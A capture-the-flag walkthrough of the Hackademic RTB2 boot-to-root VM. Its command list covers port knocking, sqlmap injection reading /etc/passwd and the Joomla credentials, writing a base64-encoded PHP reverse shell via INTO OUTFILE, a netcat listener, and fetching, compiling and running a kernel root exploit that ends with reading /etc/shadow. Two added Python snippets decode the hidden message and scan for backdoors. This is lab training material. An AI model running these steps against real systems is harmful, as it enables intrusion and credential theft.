Hackademic RTB2

Hackademic is the second challenge in a series of "boot-to-root" operating systems which has purposely designed weakness(es) built into it. The user's end goal is to interact with system using the highest user privilege they can reach.

Links

Download video: http://download.g0tmi1k.com/videos_archive/Hackademic-RTB2.mp4

Method

  • Scanned network for the target [Netdiscover]
  • Port scanned the target [UnicornScan]
  • Banner grabbed the services running on the open port(s) [NMap]
  • Interacted with the web server & bypassed the login screen [Firefox & Burp Proxy]
  • Decoded hidden message [Burp Proxy & Xlate]
  • 'Port knocked' certain ports [Netcat]
  • Discovered & exploited an SQL injection vulnerability and downloaded the configuration files [SQLMap]
  • Inserted an encoded web shell backdoor [Pentestmonkey's PHP-Reverse-Shell & Metasploit]
  • Escalated privileges via a vulnerable kernel version [CAN BCM exploit]
  • Accessed the 'flag' [Decoded image file]

Tools

Walkthrough

To begin the attack the target needs to be located on the network. The attacker uses "Netdiscover" as it is able to quickly list all IPs, MAC addresses and known vendors. As the attacker knows the target hasn't spoofed its MAC address and is aware it is running under VMware, the attacker successfully identifies the target because only one VMware vendor is listed.

The attacker now focuses on the target by port scanning every TCP & UDP port. "UnicornScan" shows two open ports, TCP 80 (HTTP) & UDP 5353 (MDNS), which the attacker then verifies by using "nmap". During nmap's scan the attacker takes advantage of its scripting engine to detect which service is running on which port as well as to banner grab (which could possibly identify the software being used & its version). Depending on the outcome of the scan, nmap then executes any other script(s). In this instance the HTTP methods were detected (which show what options are supported by the HTTP server) along with the page's title. Nmap also tries to fingerprint the operating system (Linux 2.6.17-2.6.36).

By inspecting the web service using "firefox" the attacker is able to see if any web application is running and how they can interact with it. The web server responds and presents them with a page that has a message from the target's author and a login screen.

The attacker starts "Burp Proxy" and configures it along with firefox so that burp can intercept & monitor the traffic between the attacker and the target. When the attacker enters an incorrect login, burp captures the request and response, allowing the attacker to control and repeat it using burp's "repeater" function. The attacker then repeats the same incorrect login request to verify the setup, and then again, this time altering the password to 'standard/common' values used to bypass login screens. Editor's note: As it turns out, there isn't a backend database powering the login. The valid credentials have been hard coded into the source code (File: /var/www/welcome/check.php - Line: 17-20). Unless the submitted password is exactly the same (including case and spaces), it will not work!

$pass_answer = "' or 1=1--'";
$pass_answer_2 = "' OR 1=1--'";
// A plain string comparison: the two classic injection strings are simply the hard-coded passwords,
// so no database is ever queried and only an exact (case- and space-sensitive) match passes.
if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2){
    // ...login accepted
}

After bypassing the login screen, the attacker is able to see the hidden message. When analysing the message, the attacker believes that the string has been HEX encoded; however, due to the "%" which separates each value, the attacker first uses burp's URL decoder on the message. The output still looks encoded, so the attacker decodes it again, this time using burp's HEX mode. The output produced is now (partly) 'readable'. The attacker remembers that nmap reported one port as closed and, because the message repeats the phrase "knock", starts to suspect that the rest of the encoded message relates to the technique called 'port knocking'. As the rest of the encoded message uses just '0' & '1', the attacker believes it to be encoded in binary and attempts to decode it. The result looks familiar and the attacker recognises some values as 'html'; however, due to the 'formatting/markings', burp is unable to decode it. The attacker takes the binary message and adds '&#' before every binary block (8 values) and ';' at the end of each one. This signals to burp to interpret the format differently, and burp handles the message as html code. Upon decoding, the attacker sees a group of four values, all less than 65535, and believes the message cannot be decoded any further.

The attacker uses the web site, "paulschou.net", to simplify the decoding process and is able to decode all the messages without having to alter the format at any stage to reach the same result.
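The same layered decoding done in code rather than in burp, as an added example that is not part of the original post: the layer order (percent-encoded hex, hex, 8-bit binary groups, numeric HTML entities carrying the port numbers) follows the description above, but the sample message is constructed here rather than taken from the VM, and the function names are my own.

```python
import re
from urllib.parse import unquote


def decode_percent_hex(msg: str) -> str:
    """Layer 1: '%xx' values are URL-encoded bytes; unquoting them yields the next layer."""
    if not re.fullmatch(r"(?:%[0-9A-Fa-f]{2})+", msg):
        raise ValueError("expected a pure percent-encoded string")
    return unquote(msg)


def decode_hex(msg: str) -> str:
    """Layer 2: an ASCII hex string decoded to text (readable words plus a binary tail)."""
    return bytes.fromhex(msg).decode("ascii")


# A run of space-separated 8-bit groups ('00100110 00100011 ...') inside otherwise readable text.
BINARY_RUN = re.compile(r"(?:[01]{8}(?:\s+|$))+")


def decode_binary_runs(msg: str) -> str:
    """Layer 3: replace each binary run with the ASCII it spells; readable text is left alone."""
    def to_chars(m: re.Match) -> str:
        return "".join(chr(int(b, 2)) for b in re.findall(r"[01]{8}", m.group(0)))
    return BINARY_RUN.sub(to_chars, msg)


def extract_knock_ports(msg: str) -> list[int]:
    """Layer 4: numeric HTML entities '&#N;' carry the knock sequence; reject non-port values."""
    ports = [int(n) for n in re.findall(r"&#(\d+);", msg)]
    bad = [p for p in ports if not 0 < p <= 65535]
    if bad:
        raise ValueError(f"not valid port numbers: {bad}")
    return ports


def decode_hidden_message(msg: str) -> tuple[str, list[int]]:
    """Peel all four layers and return (readable text, port sequence)."""
    text = decode_binary_runs(decode_hex(decode_percent_hex(msg)))
    return text, extract_knock_ports(text)


def build_sample(readable: str, ports: list[int]) -> str:
    """Constructed sample: apply the four layers in reverse so the decoder can run offline."""
    entities = "".join(f"&#{p};" for p in ports)
    binary = " ".join(format(ord(c), "08b") for c in entities)
    hexed = f"{readable} {binary}".encode("ascii").hex()
    return "".join(f"%{ord(c):02x}" for c in hexed)


# Constructed input; the port values are the ones this walkthrough knocks.
SAMPLE = build_sample("knock knock knock", [1001, 1101, 1011, 1001])

if __name__ == "__main__":
    text, ports = decode_hidden_message(SAMPLE)
    print(text)
    print("knock sequence:", ports)
```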

The attacker scans the closed TCP port once more. By using "netcat" the attacker is able to connect to a port of their choice, so they create a loop to connect to each of the decoded ports in turn. Afterwards they repeat the same scan as before; this time they discover that the port is reported as open. Nmap reports that the service is HTTP, using 'Apache httpd 2.2.14 (ubuntu)', so the same scripts are executed. http-robots detects that a /robots.txt file is present and reports which folders have been forbidden to be indexed by internet spiders.

Moving back to firefox, the attacker restores its proxy configuration as burp isn't needed, connects to the newly discovered web service on the non-default port and is presented with a Joomla 1.5 instance. Upon exploring the web application they try altering requested URLs and soon discover a MySQL error.

"SQLMap" automates the procedure of database injection, dramatically speeding up the attack. The attacker starts to enumerate the back end database and discovers software versions, the operating system, current database, current user and whether they are a database administrator. Afterwards the attacker discovers the password hash for the database administrator. Next the attacker starts to explore and view the contents of the Joomla database itself and as a result discovers the user credentials for the web application. The attacker continues using the SQL injection by viewing the configuration files for the system. They start off by locating their own local configuration files for their web service (which are in the same path as the target's). Upon reading the target's contents they soon learn the location of the web root for each web service running. Using this, the attacker is able to read the configuration file which stores the database credentials, as Joomla needs to be able to interact with the MySQL database. The attacker uses the default filename for the Joomla configuration file and then views the contents to reveal the credentials in plain text.

"PHPMyAdmin" is a web based GUI for managing MySQL databases, which the attacker discovers is running on one of the web services. Using the credentials gathered from the configuration file, the attacker is able to log in as the database administrator. The attacker crafts an SQL query to attempt to write a PHP file into the web root folder and then accesses it using firefox. The result: the attacker is able to write files and execute PHP commands.

To be able to interact with the target remotely, the attacker chooses to use the "PHP-pentest-monkey" shell. The attacker creates a clone copy to work on and edits the file with their IP address, as the shell will be connecting back to them (and so needs to know where the attacker is), altering the port as well as removing the start & end PHP statements as these will already be in place. Upon updating the file, the attacker encodes the shell using base64 via "msfvenom", as this will not affect the SQL statement which will be used to create the file. Before triggering the web shell, the attacker uses netcat again to listen on the same port used in the web shell. Once everything is in place, the attacker calls the web shell, causing the target to execute the PHP function that decodes the backdoor and makes a connection back to the attacker. This gives the attacker command line access to the target with the same permissions as the web server.
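From the defender's side, as an added example that is not part of the original post: a scanner for the eval(base64_decode(...)) wrapper that a base64-encoded PHP backdoor dropped into the web root relies on, which also decodes the blob so an analyst can see what it would run. The web root contents and the harmless payload are constructed here, and the function names are my own.

```python
import base64
import re
import tempfile
from pathlib import Path

# eval(base64_decode(...)) with the blob quoted or bare: the wrapper a base64-encoded PHP backdoor needs.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)\s*\)"
)


def scan_php_source(src: str) -> list[dict]:
    """One finding per eval(base64_decode(...)) call, with a preview of the code it would run."""
    findings = []
    for m in EVAL_B64.finditer(src):
        try:
            preview = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
            preview = "<undecodable>"
        findings.append({"offset": m.start(), "preview": preview[:80]})
    return findings


def scan_webroot(root: Path) -> dict[str, list[dict]]:
    """Walk every .php file under the web root and keep only those with findings."""
    results = {}
    for php in sorted(root.rglob("*.php")):
        hits = scan_php_source(php.read_text(errors="replace"))
        if hits:
            results[str(php.relative_to(root))] = hits
    return results


# Constructed sample files: an ordinary page and a dropped file whose decoded payload is harmless.
BENIGN_PHP = "<?php echo 'hello'; ?>\n"
HARMLESS_PAYLOAD = b"echo 'decoded at runtime';"
SUSPECT_PHP = (
    "<?php eval(base64_decode('" + base64.b64encode(HARMLESS_PAYLOAD).decode() + "')); ?>\n"
)


def demo() -> dict[str, list[dict]]:
    """Write the constructed files into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(BENIGN_PHP)
        (root / "backdoor.php").write_text(SUSPECT_PHP)
        return scan_webroot(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for h in hits:
            print(f"{path}: eval(base64_decode) at offset {h['offset']} -> {h['preview']!r}")
```

On a real host the same scan is only a first pass: a file the MySQL server wrote via INTO OUTFILE is also owned by the database user rather than the web server user, which is worth checking alongside the content match.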

The attacker wishes to gain deeper access into the system by escalating privileges. One common method is to exploit the kernel (this ONLY works if it is the 'correct' version!). The attacker finds the target's kernel version, searches their local copy of a public exploit database "exploit-db" and discovers a potential exploit which matches the kernel version. The attacker checks that the exploit code doesn't contain any 'non-code' at the top of the file, as that would stop the file compiling (it is common for exploits to have 'shout outs' here), copies a version to their local web root folder and sets the file's permissions to make sure every user has access to it. After everything is ready the attacker then starts a web server.

Controlling the target the attacker is able to locate a folder which they have permission to write to and execute files from. Afterwards they instruct the target to download the exploit code from the attacker and compile it. Upon execution the attacker has now got root access on the target's machine.

Game over

When they explore root's home folder, they notice the "key" file. The attacker notices the text file extension and views the content; upon doing so, they see the message has been encoded. The "=" at the end of the message is a common sign that base64 has been used. The attacker pastes the message back into burp and decodes it. Seeing the mention of "png" hints that the decoded value is an image file. After using the web site "opinionatedgeek.com" to decode and download the file, the attacker checks the file signature. It appears to be a valid png file and they open it to reveal the 'flag/proof', indicating the end goal.

Game over...again

Commands

us -H -msf -Iv 192.168.0.112 -p 1-65535 && us -H -mU -Iv 192.168.0.112 -p 1-65535
nmap -p 1-65535 -T4 -A 192.168.0.112   # Scans very quick, didn't need ETA via -v
BT -> firefox -> 192.168.0.112
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite    # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080
// Firefox -> admin:password
// burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: admin Password: ' OR 1=1--' etc etc    # NOT 'OR 1=1--' (User can be anything)
Copy (black) test -> decoder -> url -> ASCII HEX
echo "<binary>" | sed "s/   /;\&#/g;s/ //g;s/^/&#/;s/$/;/"   # Somehow its do-able in burp, Just can't figure it out! =(
// Burp -> Binary -> HTML
// Firefox -> Google -> ascii convert online -> http://home2.paulschou.net/tools/xlate/ -> HEX -> HEX -> Binary
nmap -p 666 -T4 -A -v 192.168.0.112
for x in 1001 1101 1011 1001; do
   nc -z 192.168.0.112 $x
done
nmap -p 666 -T4 -A -v 192.168.0.112
// firefox -> 192.168.0.112:666  -> List of content items...
cd /pentest/database/sqlmap
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -p letter --banner --current-db --current-user --is-dba
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --passwords
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dbs
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --tables -D joomla
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dump -D joomla -T jos_users
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.112/files/_etc_passwd
find / -name apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
tail /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_sites-enabled_000-default
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php    # Joomla default
cat /pentest/database/sqlmap/output/192.168.0.112/files/_var_www_configuration.php | grep -i pass -A 1 -B 1
// firefox -> 192.168.0.112:666/phpmyadmin/   # root yUtJklM97W
cp /pentest/backdoors/web/webshells/php-reverse-shell.php /tmp/bd.php
cd /tmp
nano +w bd.php    # edit IP address
msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=bd.php
nc -lvvp 1234
sql -> select "<?php msfoutput ?>" INTO OUTFILE "/var/www/backdoor.php";
#w; last; uname -a; id; ls -lah;
#netstat -antp
#ps aux
##ls -lahR /home
uname -r

cd /pentest/exploits/exploitdb
cat files.csv | grep "linux,local" | grep "Privilege Escalation" | grep 2.6.3
head platforms/linux/local/14814.c
cp platforms/linux/local/14814.c /var/www/root.c
chmod 755 /var/www/root.c
/etc/init.d/apache2 start

ls -lah /
cd /tmp
wget 192.168.0.162/root.c
gcc root.c -o root
./root
whoami
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root
cat /root/Key.txt
// Burp -> Decoder -> Base64

#---Notes---
#Joomla: 1.5.22      # User: Administrator
#phpMyAdmin: 3.3.2.0
#curl http://192.168.0.112:666/phpmyadmin/changelog.php
#curl http://192.168.0.112:666/robots.txt
#curl http://192.168.0.112:666/htaccess.txt

Notes

  • When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
  • Some mistakes in the video are more obvious.
  • Instead of using "PHP-Reverse-Shell" & "netcat", "PHP Meterpreter" & "Metasploit" could have been used.
  • It is worth downloading Joomla to be familiar with a default configuration.
  • The target uses DHCP to obtain an IP address.
  • The selection area to record was not aligned when I recorded it.

Song(s): Martin Solveig & Dragonette - Hello & Klaas meets Haddaway - What is love (Klaas Radio Edit) & Scotty - The Black Pearl (Dave Darell Radio Edit) & Trent Reznor & Atticus Ross - In the Hall of the Mountain King (The Social Network) & Charlie Clouser - The Final Zepp

Video length: 13:47

Capture length: 64:30

Blog Post: https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/